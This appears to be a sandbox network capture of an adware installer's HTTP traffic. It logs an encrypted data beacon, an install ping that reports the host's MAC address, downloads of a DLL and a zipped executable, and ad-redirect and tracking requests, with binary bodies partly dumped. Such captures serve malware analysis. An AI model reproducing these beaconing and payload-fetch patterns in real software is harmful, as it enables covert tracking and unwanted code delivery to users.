Unless-Modified-Since: Fri, 27 Feb 2015 14:07:01 GMT

If-Range: "54f07a05-12d72"

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Range: bytes 46408-77169/77170

Content-Type: image/gif

Date: Sun, 28 Jun 2015 05:46:28 GMT

ETag: "54f07a05-12d72"

Last-Modified: Fri, 27 Feb 2015 14:07:01 GMT

Server: nginx

Content-Length: 30762

Connection: keep-alive
..;(...W..\lzJ.....D.uoX*.>.......{.....H..o.|;....H...............
}D...i......6P..............WB.O.z.......\${.W~...v.{.H{..z..{{.~t.y).
.5..........z.'zq..?.D.p.&.x.&|...<..&x...j......'..*%.....5..&.|).
.q.d.`.T.|q..v`.e@.$../..l..Kh.l.7O...0.J..WH.Yh.[H.Uh.}..'0.]...p.6..
l...P.m..P... ....e..n..'..yH.e...H.0..t..o0..p.D..!..=.n..........P..
...t....^0.....H..X.....H....%...$....kP........X....E............X..8
.................X..x....................`..``..P.5...s7..0H... ....E0
..P.E..............]@...........(.....X.....9..P..I..I....... ).....H.
!.#.......9.*...)./I.#)...N`...........=...p.D..B...`.H9.KY.G........N
I..`.X9.P).W..F..A..]..d..B..a..F.._..g..U..by..`.b..J9.R..C..]..u..tI
.Y.....!.......,....|...........7.....L..........7L......3....3.....7.
...........3..............................a1N.*.1.....................
......1..**....*.....^.l..:2.p..........<....S....|..i.......KIH.E.
...PZ...e.J2U~..)g...\....'E.... J.h..?%pC....H.......J|\........XY..)
6.Q.l...M........q....0.H.8../.L..7.... .b.2v.XL....#..8R............H
........H` ...h..d....o...}#...wj...5..Yr%.....T...R...pU.z&......=<
;.................Rv......_~.H.}..w..G.~....#.........#6.a... x.. ....
x,....|.b)$.(.. .X...8.b..2P.......8V..........8$....$....xb.4:.d..(9.
..\..x.."..-8..# 8.. ..)c%e.YJ.afRf....f$s......YI...yg" th...`8.!....
.r.q.......-LZg.|.....2j..q.i........TX..`...t.\......G...b..... ... C
).......PG.9..@)..PG..D;....qm%[email protected]._..p..9.. ....H.z......;.
....k... ,..:...Z....[@.J...b ....!..........C........!D......)..l
<<< skipped >>>

POST /0a47f93be658c7bb00d558b4ec90421a71854a2101d389448776a4db9bb9613346e46f6b897f310e54c5e69f1cff337c65944ddcddf9c379 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 3 R:2

Host: api.magnofiler.com

Content-Length: 4390

Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6FD7F7EB6471F6E1008FAF67D6BFDB01B26EAAA801BC7C09F4151D3761C9F974F6921D434084F69EB0E2262EC981EFAF4B71B6DE53AB1621839F9301B469E85E3DEEA269604ED17849843D57DA5D052460EA403F0E2730A705291EE1BB655062579317F3835A3F1C8D611E8D59DE4E29330C729C3611175A91D6C4B2CA57BF51B8A93E962C0C6C7C6FD68E8538140D71783E4C4BC3B5B22FF7ECDE5FC9B9ED24BFC5A1063591E00A85105DB354B9CFED52E1FDED55611F974A681E46205771CBFD684FDBE1A3CC33DF9A20DD07C130FA67048DEB4E4AA46D0A12A859B33C6FC95FD6D161BF80F449A0AA47E284D3FD2D160627EC6E3F5C159A4F097C9FB122C04FAFD1751F8D6CBA9EEE4657E470317678F50A31637266EC2018089C0D039C73445B6B9DD32B1DF50B052B8A4C34E9493BBD046BC6D88308A7BD19BF210253BEB168CFAC2B6789814345EF2C6CD994486A7B6111AD4A6A856D662603FECFE29E2ACE2CFC82FCC4D1115E45D13115394D516B32B795B4DB5BB0D73BD857324759CD70DD012EE152502A0BF209E6A6FA0B39F48014409C3F29DBB3266548C615C77227BB225FB7CE578A7166CE993387B3CE8C874EAACB610F7019A79D231485844614753EFA8AB66387929CB18159A7FAB01CF64AC931A5138700FD1A4CB184B5EB1A8F8D50EC5524787440ED2970829249C3F0ED8B38451B0B781C1186909BF388DA1BCD8D678B5B13D8EC0CA9051A35B363A1185F2E57101844CDAE4F0F5DBC324F40869165AFDF17FD6FC03366ED488A0FE6A8B4356F4E062F8FCF7C46786F5F50E15054C64E
HTTP/1.1 200 OK

Content-Type: text/plain

Date: Sun, 28 Jun 2015 05:46:31 GMT

Server: nginx

Content-Length: 7

Connection: keep-alive
MAXTHX.HTTP/1.1 200 OK..Content-Type: text/plain..Date: Sun, 28 Jun 20
15 05:46:31 GMT..Server: nginx..Content-Length: 7..Connection: keep-al
ive..MAXTHX.....


GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/bullet-short.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/gif

Date: Sun, 28 Jun 2015 05:46:31 GMT

ETag: "54f079fd-36"

Last-Modified: Fri, 27 Feb 2015 14:06:53 GMT

Server: nginx

Content-Length: 54

Connection: keep-alive
GIF89a.............!.......,...................P..U..;HTTP/1.1 200 OK.
.Accept-Ranges: bytes..Content-Type: image/gif..Date: Sun, 28 Jun 2015
 05:46:31 GMT..ETag: "54f079fd-36"..Last-Modified: Fri, 27 Feb 2015 14
:06:53 GMT..Server: nginx..Content-Length: 54..Connection: keep-alive.
.GIF89a.............!.......,...................P..U..;..

GET /ltv/install/?idapp=23&action=install&mac=0050563B0E71&country=US HTTP/1.1

Host: ltv-pre.tguhost.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Content-Type: xml

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.7

Cache-Control: no-cache

Date: Sun, 28 Jun 2015 05:47:05 GMT
39..<?xml version="1.0" encoding="utf-8"?>.<result>1</r
esult>..0..

GET /__maxpower__/render_screen/2014/11/a888aa68-73d0-11e4-b71d-06a3579b0dab/screen_variation=videoUpdater HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Language: en

Content-Type: text/html; charset=utf-8

Date: Sun, 28 Jun 2015 05:46:31 GMT

Server: nginx

Vary: Accept-Language

Content-Length: 814

Connection: keep-alive
.<!--finish Videoupdater-->....<div class="finish">..<h
1>........Setup Wizard.......</h1>..<p style="margin-top: 
15px; font-size: 13px;">You have succesfully installed the software
 below and they are ready to be used:</p>....<div class="item
s">...<ul>....<li class="check">%mapp%</li>......
</ul>..</div>....<div class="clear"></div>....
<p>Recommended offers:</p>......<div class="list-toolba
rs" id="alloffers">....<ul class="_FinishOffers">....</ul&
gt;...</div>....<!--...<div class="banner">......<if
rame src="hXXp://n149adserv.com/ads?key=09879bcf6e631312a2c4d02d9cae27
2f&width=300&height=250" frameborder='0' scrolling='no' width='300' he
ight='250'></iframe>...</div> ..-->.........<inpu
t id="_Bexit" class="_Bexit close absol" tabindex="2" type="submit" na
me="nombre" onclick='onExit()' value="Close">....</div>..HTTP
/1.1 200 OK..Accept-Ranges: bytes..Content-Language: en..Content-Type:
 text/html; charset=utf-8..Date: Sun, 28 Jun 2015 05:46:31 GMT..Server
: nginx..Vary: Accept-Language..Content-Length: 814..Connection: keep-
alive...<!--finish Videoupdater-->....<div class="finish">
..<h1>........Setup Wizard.......</h1>..<p style="margi
n-top: 15px; font-size: 13px;">You have succesfully installed the s
oftware below and they are ready to be used:</p>....<div clas
s="items">...<ul>....<li class="check">%mapp%</l
<<< skipped >>>

GET /d5/msjava.dll HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: static.magnofiler.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Sun, 28 Jun 2015 05:46:12 GMT

ETag: "54ef0d1b-e5910"

Last-Modified: Thu, 26 Feb 2015 12:10:03 GMT

Server: nginx

Content-Length: 940304

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L.....C8
...........#...............................k..........................
......m...............................`#..te..........................
......................................................................
...........................text............................... ..`.dat
a...d"......."[email protected].............................
..@[email protected][email protected]@...0[.8M..... 8W...
4.D8a...4.D8l...6.D8y...5.D8............KERNEL32.dll.NTDLL.DLL.GDI32.d
ll.USER32.dll.ADVAPI32.dll.OLEAUT32.dll.ole32.dll.....................
......................................................................
......................................................................
......................................................................
......................................................................
............................................ .........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000.&ce_cid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000. HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.webtrackerplus.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sun, 28 Jun 2015 05:46:33 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

location: hXXp://3p6.popularfastchannel.com/?s1=&s2=&s3=

Set-Cookie: SERVERID=web1; path=/

Set-Cookie: visid_incap_227739=Sd7gRlh TfeE3CfG00NmtzmKj1UAAAAAQUIPAAAAAAD5Rcse3 iYnt23b/8lNgH3; expires=Mon, 26 Jun 2017 20:44:35 GMT; path=/; Domain=.webtrackerplus.com

Set-Cookie: incap_ses_323_227739=qXyoBUCM8w1Tm4Mq/YZ7BDmKj1UAAAAAiOEyxG3QB5VUf7bMXFGI7Q==; path=/; Domain=.webtrackerplus.com

Set-Cookie: ___utmvmFPupvfO=VXWLblPKYac; path=/; Max-Age=900

Set-Cookie: ___utmvaFPupvfO=mwS.pxzR; path=/; Max-Age=900

Set-Cookie: ___utmvbFPupvfO=SZm

    XTlOYalD: atO; path=/; Max-Age=900

X-Iinfo: 7-50661090-50661091 NNNN CT(112 -1 0) RT(1435470393027 1) q(0 0 1 0) r(2 2) U5

X-CDN: Incapsula
0..

GET /js/show_ads.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.magnofiler.com/BesH3gE9/pop-up/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: n149adserv.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Accept-Ranges: bytes

ETag: W/"7614-1432285206000"

Last-Modified: Fri, 22 May 2015 09:00:06 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Sun, 28 Jun 2015 05:46:29 GMT
a..............200...Ymo.8.. 6.....8=...U.4.^.H[\.......h..,jE.......I
..,{.......G....g...;,....l..A4.i... b.u*[email protected]..}...=..R*.......=.X
..p..ln.).....c..Q).i....w..|...',_.<l.6....).i._.EF.,....2......'&
gt;u.2....,&a.......s.G...6.!..D....O.2I.0e...6{.=s....s......G.......
.....!.`.......r..hl.{...o..=..u.r..y.w.....;\.y.......t.gT.._J._.X.|%
..#./.d..s......)..T|'n..".~..b....j!....Us?.i,.`P...y:s......^..y..b.
-...G4.._f.....^......y...M...........U....~.;..l..{.....X..9Ob.....A.
.......B<p&..bq-".L.AtV;.....T..O;../...!..ah.....200..V9.*....U ..
.4|.;V...;O..N>.GOA.... #8.Ft...e~..sG.HH..V..~..!.....|[email protected].....
Cwk/.w..fA Z.....l^...qg.>b....G...P..F.. G..j.0?..#.....$..G..P<
;.A......{..,....Y......K.*[email protected]...(=91..C~....c.a.'...t
..!.S.'...v..^..?.d.....1.....`...Ng..Dd^w>.....G.9..[..>/..|O.f
.hd..L.V1[...1..E.T,...qS.......2G7i.GC.gBr....E......U..xZ1|t.g...V..
...XH.R...R..."..D.>.0U...z..[GU1.(.y.L......|.)[email protected]].-..c..`....
C.|.G o..|..hb..2iL......T#p.bV.)b.z).....AZ.k.v..o.......n /"..|."...
......3...]^...u.1....1..\.P..200..H.b-......z......r\p....L..H].Q._Y.
W..v..DA.R..:..I=.C..Jg{W.....#.e.......O.#.....................\.0Q..
[email protected]..,AK!...H#...."...$..:p...S.R.k..Y:..<
...U....m6\..@.<.`...3.f......p.r.9....U.*]..f.b..k.i_..U..z..n1...
.&C|.6.X.1*X...k......P]...^k....U.=~..mrc......Jc.aASj,.|...B.f.l....
.....*.1..^[d....Fe.m7J.PW.v..C/d...E..l.....f5..v.D...B...'.&T....&E.
D....h.O.......M.R.4..h......sb{.YQ..Nm=%..d.....zO.{....9.*s.H..d
<<< skipped >>>

GET /ads-sync.js?v=1&key=8807bef3df789cfc967df2f12545a152&ch=&click=&tz=3&t=1435470398142&requestUrl=http://VVV.magnofiler.com/BesH3gE9/pop-up/&requestRef=&flashVer=11.6 r602&scrWidth=1916&scrHeight=902&cIds= HTTP/1.1

Accept: */*

Referer: hXXp://VVV.magnofiler.com/BesH3gE9/pop-up/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: n149adserv.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="CAO PSA OUR"

Set-Cookie: epomUUID=07032691-1d59-11e5-9d25-f8bc125381b8; Domain=.n149adserv.com; Expires=Sat, 23-Jun-2035 05:46:31 GMT; Path=/

Content-Type: text/javascript;charset=UTF-8

Content-Length: 579

Date: Sun, 28 Jun 2015 05:46:30 GMT
document.write("<meta http-equiv=\"refresh\" content=\"0; url=http:
\/\/network.adsmarket.com\/click\/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SY
mGakfZSJkGqaYKOBl7dia5Vmon2X?dp=Mjd8NTc4fFVBfDF8MXx8|34ee69d9819b5a94d
f7268d81470e3f3-17-62|07032691-1d59-11e5-9d25-f8bc125381b8\" \/><
;script type=\"text\/javascript\">new Image().src = \"http:\/\/n149
adserv.com\" \"\/im\" \"pressi\" \"on.gif?b=578\" \"&p=27&ch=&ap=&cps=
&c\" \"=62&l=UA\" \"&h=f06adb393bb490dc4c52810f86c8f01c&t=\" new Date(
).getTime() \"&s=c47076fae961fb2577a65c66edeb9402\";<\/script>")
;.CustomWLAdServer.addCampaignId(62);HTTP/1.1 200 OK..Server: Apache-C
oyote/1.1..Cache-Control: no-cache..Pragma: no-cache..Expires: Thu, 01
 Jan 1970 00:00:00 GMT..P3P: CP="CAO PSA OUR"..Set-Cookie: epomUUID=07
032691-1d59-11e5-9d25-f8bc125381b8; Domain=.n149adserv.com; Expires=Sa
t, 23-Jun-2035 05:46:31 GMT; Path=/..Content-Type: text/javascript;cha
rset=UTF-8..Content-Length: 579..Date: Sun, 28 Jun 2015 05:46:30 GMT..
document.write("<meta http-equiv=\"refresh\" content=\"0; url=http:
\/\/network.adsmarket.com\/click\/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SY
mGakfZSJkGqaYKOBl7dia5Vmon2X?dp=Mjd8NTc4fFVBfDF8MXx8|34ee69d9819b5a94d
f7268d81470e3f3-17-62|07032691-1d59-11e5-9d25-f8bc125381b8\" \/><
;script type=\"text\/javascript\">new Image().src = \"http:\/\/n149
adserv.com\" \"\/im\" \"pressi\" \"on.gif?b=578\" \"&p=27&ch=&ap=&cps=
&c\" \"=62&l=UA\" \"&h=f06adb393bb490dc4c52810f86c8f01c&t=\" new Date(
).getTime() \"&s=c47076fae961fb2577a65c66edeb9402\";<\/script&g
<<< skipped >>>

GET /impression.gif?b=578&p=27&ch=&ap=&cps=&c=62&l=UA&h=f06adb393bb490dc4c52810f86c8f01c&t=1435470399377&s=c47076fae961fb2577a65c66edeb9402 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.magnofiler.com/BesH3gE9/pop-up/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: n149adserv.com

Connection: Keep-Alive

Cookie: epomUUID=07032691-1d59-11e5-9d25-f8bc125381b8

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="CAO PSA OUR"

Set-Cookie: ubv=Mjd8NTc4fFVBfDF8MXx8-1435470391679--; Domain=.n149adserv.com; Expires=Mon, 27-Jun-2016 05:46:31 GMT; Path=/

Set-Cookie: epa=""; Domain=.n149adserv.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Set-Cookie: epan=""; Domain=.n149adserv.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Set-Cookie: ucv=62-UA-1435556791679-24--; Domain=.n149adserv.com; Expires=Mon, 27-Jun-2016 05:46:31 GMT; Path=/

Accept-Ranges: bytes

ETag: W/"49-1424190054000"

Last-Modified: Tue, 17 Feb 2015 16:20:54 GMT

Content-Type: image/gif

Content-Length: 49

Date: Sun, 28 Jun 2015 05:46:30 GMT
GIF89a...................!.......,...........T..;HTTP/1.1 200 OK..Serv
er: Apache-Coyote/1.1..Cache-Control: no-cache..Pragma: no-cache..Expi
res: Thu, 01 Jan 1970 00:00:00 GMT..P3P: CP="CAO PSA OUR"..Set-Cookie:
 ubv=Mjd8NTc4fFVBfDF8MXx8-1435470391679--; Domain=.n149adserv.com; Exp
ires=Mon, 27-Jun-2016 05:46:31 GMT; Path=/..Set-Cookie: epa=""; Domain
=.n149adserv.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/..Set-C
ookie: epan=""; Domain=.n149adserv.com; Expires=Thu, 01-Jan-1970 00:00
:10 GMT; Path=/..Set-Cookie: ucv=62-UA-1435556791679-24--; Domain=.n14
9adserv.com; Expires=Mon, 27-Jun-2016 05:46:31 GMT; Path=/..Accept-Ran
ges: bytes..ETag: W/"49-1424190054000"..Last-Modified: Tue, 17 Feb 201
5 16:20:54 GMT..Content-Type: image/gif..Content-Length: 49..Date: Sun
, 28 Jun 2015 05:46:30 GMT..GIF89a...................!.......,........
...T..;..
<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style-ie.css HTTP/1.1

Accept: */*

Referer: hXXp://8mdzz.exclusiverewards.7015.info/?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 8mdzz.exclusiverewards.7015.info

Connection: Keep-Alive

Cookie: ci_session=MoMg5mPvtwd7eyN64guc0nuIl92MZZ/Sm6ZOBVWtMH03rnmP1Qd8RxHBrM071hCvOSUBHn+HXc1s/Nog0g9MvHZzZOaBei6Y+dUEKnxL80aCpz1U5nP438cHsHrNJaUtzgb8F2VLJMF4KKgW7i5LZXSV08INJtE6nYVemH8hjAHJB2JL5ITHuRK20pcxo581BQk8vt1ayWn0jrdiTaIYjNXQPT9wBX5yO/bvVK8KgT097C1jRs23IAExjG4eI+P1tmM/Rbv2V/C7cpPdfWCTtGeN/Z1caiLF1Akhh25xhkiECBnRkD783wTi8p3K16zkB95+7i39Zumlp/SYanUS2Wc6snGl+4zGxnnmZzl1iD+upjU4/cjMZ6UONfZa/lk7+pK8Sn0VAltvQzK00mllO2MkYo5jBYbkDMe9/9uS4VPZWDlFCzR2JABFZNx86kYr/2y/Q9doNtUewoU2RGklsQ==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0; tags[227198][p
HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Sun, 28 Jun 2015 05:46:37 GMT

Content-Type: text/css

Last-Modified: Fri, 11 Oct 2013 18:30:44 GMT

Transfer-Encoding: chunked

Expires: Wed, 22 Jun 2016 05:46:37 GMT

Cache-Control: max-age=31104000

Pragma: public

Cache-Control: public, must-revalidate, proxy-revalidate

Content-Encoding: gzip
269.............S...0.=o.b....6!....;{.zh{GN.....:N...{'v`.......x..{.
...)...AT1..<......j...9L..5....E3.c..f.....F..g[..-Z.LxX.'.N..9<
;....m.`.....f.PI-*<..,..Kn.T.....V.zk.yn.[..Tuh.%,I.k..f<G$.V.l
.C7..B...1....r..z.#^b......e.A..\[email protected].:l$.i..s....w/:#Qu.`.<..
.....[A.4D{..V....*..=..;{.#..e..1.:8..I.e6.?....N....a.Qh.w.....~.-.h
...i.V..Y.Ai..wkD5.c..q=.v.....q....I......3......F...b*%......2..|p..
......d.-}.l.Q..M...8...Dc.\...y|........i..\./..N.L.......l.$.S.\.~&l
t;P`..[a..^.....hz....x..J.M.1}...2.c7.KrnE.oH.2^,...1....".......!9..
3.zi.^w.......7..`k=kdM7... ..N6........&?.Nt.U........./%g.L.....S.'.
..K.h.O.....0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Sun, 28 Jun
 2015 05:46:37 GMT..Content-Type: text/css..Last-Modified: Fri, 11 Oct
 2013 18:30:44 GMT..Transfer-Encoding: chunked..Expires: Wed, 22 Jun 2
016 05:46:37 GMT..Cache-Control: max-age=31104000..Pragma: public..Cac
he-Control: public, must-revalidate, proxy-revalidate..Content-Encodin
g: gzip..269.............S...0.=o.b....6!....;{.zh{GN.....:N...{'v`...
....x..{....)...AT1..<......j...9L..5....E3.c..f.....F..g[..-Z.LxX.
'.N..9<....m.`.....f.PI-*<..,..Kn.T.....V.zk.yn.[..Tuh.%,I.k..f&
lt;G$.V.l.C7..B...1....r..z.#^b......e.A..\[email protected].:l$.i..s....w/:#Qu
.`.<.......[A.4D{..V....*..=..;{.#..e..1.:8..I.e6.?....N....a.Qh.w.
....~.-.h...i.V..Y.Ai..wkD5.c..q=.v.....q....I......3......F...b*%....
..2..|p........d.-}.l.Q..M...8...Dc.\...y|........i..\./..N.L.......l.
$.S.\.~<P`..[a..^.....hz....x..J.M.1}...2.c7.KrnE.oH.2^,...1...
<<< skipped >>>

GET /sdb/df/ffmpeg.zip HTTP/1.0

Host: staticrr.mixvideoplayer.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 28 Jun 2015 05:46:41 GMT

Content-Type: application/zip

Content-Length: 10143125

Last-Modified: Thu, 21 May 2015 14:48:55 GMT

Connection: close

ETag: "555df057-9ac595"

Accept-Ranges: bytes
PK........o..F=........X}.....ffmpeg.exe..}`T..?|o...Vo...D.ukc......]
H..Q#.....E..*.F......uX...Z....P..W._..XP..........E..^.9.3s.-..{~..O
Z.wg...9s.......6-S.4....j.bM.y.#....G...h....8u.^..Sk&.45...........?
7.r........{.-.7.._q...?.:...G...VuT...*..u^v.(..-...O.8A..q.V3M.~..m.
..l.......3$...O.[.G..W...gj^.....'[.dk..S.........{..4.o7....I.....nl
..s....lzA_c........'.....g/..}_J..A...W..>.v.....5m........O.....V
...)%.h..*z.o.....S....D........{.l.iH.......R. j.X>.....g.........
.e...]...............~:^Bo........>....pg.z....t...I..H............
..x.. .~.W.v..H./..>.u.F......RI.f........m..7iA...A....K.-..5....(
.Y..AM..E.....3.T.?...S.af[]..5...O..u..=...yv7.4.......'...e.Y.R..Y..
.o.-..W.Nl..O.].G....../[email protected]..@!...
,...~E)...x..o..C.....<3....[.....Y.n....2T.....#.}@.a.C>.....l.
...\.....u....|.(8a>d.8.....Q..Cr.^.9...@f..."..%...x...s;(........
.loX7..~y6..u#.%...S...PI/...D.d...~.7.......:.j...X C..~F.Q ....HXt.*
-.?..$..tK.....u...u....6...z..{..vj..Oh.......|.k.....Z..K...]7..n...
l...w.-{.mT..i.P.x.....&....o..tq.....N7..X....E...gS..0..9f.I.;.:...`
..........A..$..( [email protected]....'....s;...q;..]..._;.a...g..ma......:
..m......f.|.....N....3..../.q..P.kA6=..j..I.....,.!ji>rB7......U..
..-&..\....Q..).27..=.................... ...4...z.E.[..p:#?..F..w...'
8".R.,. .....P..u.=.<.P...../.J...%6....._..<..&#.'.......?....o
...Xpc...[..\.d.X=..E(-..8(.x s4.P...y.....z__*.:.......l~{mG[.....p.P
qW...X.zQ...... ...5..6.....)./...:...#._......oH.?...7..G.;<.-
<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: text/html

Date: Sun, 28 Jun 2015 05:46:11 GMT

ETag: "5452135c-38"

Last-Modified: Thu, 30 Oct 2014 10:30:52 GMT

Server: nginx

Content-Length: 56

Connection: keep-alive
<html><head><title>ok</title></head><
body></body></html>HTTP/1.1 200 OK..Accept-Ranges: byte
s..Content-Type: text/html..Date: Sun, 28 Jun 2015 05:46:11 GMT..ETag:
 "5452135c-38"..Last-Modified: Thu, 30 Oct 2014 10:30:52 GMT..Server: 
nginx..Content-Length: 56..Connection: keep-alive..<html><hea
d><title>ok</title></head><body></body&g
t;</html>....


GET /?ctrak3.2.614=c_Start_Application HTTP/1.1

User-Agent: session

Host: api.magnofiler.com

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: text/html

Date: Sun, 28 Jun 2015 05:46:16 GMT

ETag: "54521356-38"

Last-Modified: Thu, 30 Oct 2014 10:30:46 GMT

Server: nginx

Content-Length: 56

Connection: keep-alive
<html><head><title>ok</title></head><
body></body></html>HTTP/1.1 200 OK..Accept-Ranges: byte
s..Content-Type: text/html..Date: Sun, 28 Jun 2015 05:46:16 GMT..ETag:
 "54521356-38"..Last-Modified: Thu, 30 Oct 2014 10:30:46 GMT..Server: 
nginx..Content-Length: 56..Connection: keep-alive..<html><hea
d><title>ok</title></head><body></body&g
t;</html>....


GET /040bf155cdc35c2a206dc876267f6d44d0241d20905aaee4793e7b4ca4eefde7809f2b49f84688188854ab2b9139c8ea439cce87b9a53f92e4adae67440907af1badca16ac7907894d654e60e63e0c28075042ab211bc5fc0ba6f17e7015222f8de0bc46898bb29a HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/html

Date: Sun, 28 Jun 2015 05:46:19 GMT

Server: nginx

transfer-encoding: chunked

Connection: keep-alive
224c..da72df629a3e19f26fb95fb40f83d37736ac8e2079a92071610686e5a7c43fb6
4246b6e36fea8c4fff3fd096861c6766c223390b7395c22b3fa2f220769ab4ce6b28a2
f769f60c90a4a3072a880d32411ea87cf065762cef21cbfdfa48f285571b1a0283b64a
44f7a8f9f1c64dc51b6753c8ea760b74a37643596c3369d4e0ab405cdadd44ad3f1156
bdf7f61204c21cdaf0910fabb91505284a76f3d94ee1f628b2e8335d6734507cb52c27
7a24298c519dacedff89cc7cbac670b40b77d8b509cb29999b0f80da561e99725492ce
a618ba006f877e9d412b545229a66491474826f1d9c7234b42c66e7f62d099a3ce76ed
cb2483cf471efd34ec448e199b7ed41dc7f3b0e6bf84d0795a84d4c1ec7dbdd12b9e99
b607d654eb65b2c8c6b84796e3f097c64e36359754c47cae41794f61bb1907bb346b4d
42c60ce301536a22bfea36872becaec2ca86e935480b94265f09f3574c5e615ff111a1
a95740e0674ddd63b0a9719a1a3b19d23be02d90ed9ed019f76e6ac396b75205d7aae2
